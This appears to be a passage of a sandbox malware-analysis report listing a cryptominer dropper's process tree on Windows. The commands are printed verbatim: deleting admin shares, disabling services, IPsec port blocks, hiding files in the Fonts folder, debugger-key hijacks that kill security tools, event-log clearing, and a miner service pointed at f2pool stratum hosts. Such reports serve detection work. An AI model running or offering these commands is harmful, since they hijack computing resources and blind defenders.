C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share admin$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share c$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share c$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share d$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share d$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share e$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share e$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share f$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share f$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet stop lanmanserver /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop lanmanserver /y4⤵
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= DISABLED3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc start PolicyAgent3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config PolicyAgent start= AUTO3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop Graphipcs_PerfSvcs3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Graphipcs_PerfSvcs3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\svchost.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\svchost.exe /d everyone3⤵
-
C:\Windows\SysWOW64\sc.exesc stop conhost3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete conhost3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\conhost.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\conhost.exe /d everyone3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\sc.exesc start PolicyAgent3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config PolicyAgent start= AUTO3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Aliyun3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Allowlist3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=denylist3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1353⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1373⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1383⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1393⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=4453⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=Allow action=permit3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Aliyun assign=y3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lsars.exe /im lsacs.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im sqlservr.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Fonts\sqlservr.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\sqlservr.exe /d everyone3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Fonts\csrss.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\csrss.exe /d everyone3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\lsass.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\lsass.exe /d everyone3⤵
-
C:\Windows\SysWOW64\sc.exesc stop "Application Layre Gateway Saervice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Application Layre Gateway Saervice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im boy.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\boy.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\boy.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im powershell.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sethc.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im wscript.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "windows powershell"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "security"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "system"3⤵
- Clears Windows event logs
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start MetPipAtcivator2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
- Deletes itself
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\conhost.exe"c:\windows\Fonts\conhost.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im taskmgr.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im taskmgr.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im rundll32.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rundll32.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im autoruns.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im autoruns.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im ProcessHacker.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ProcessHacker.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im procexp.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im procexp.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im perfmon.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im perfmon.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash3⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start SetPipAtcivator3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
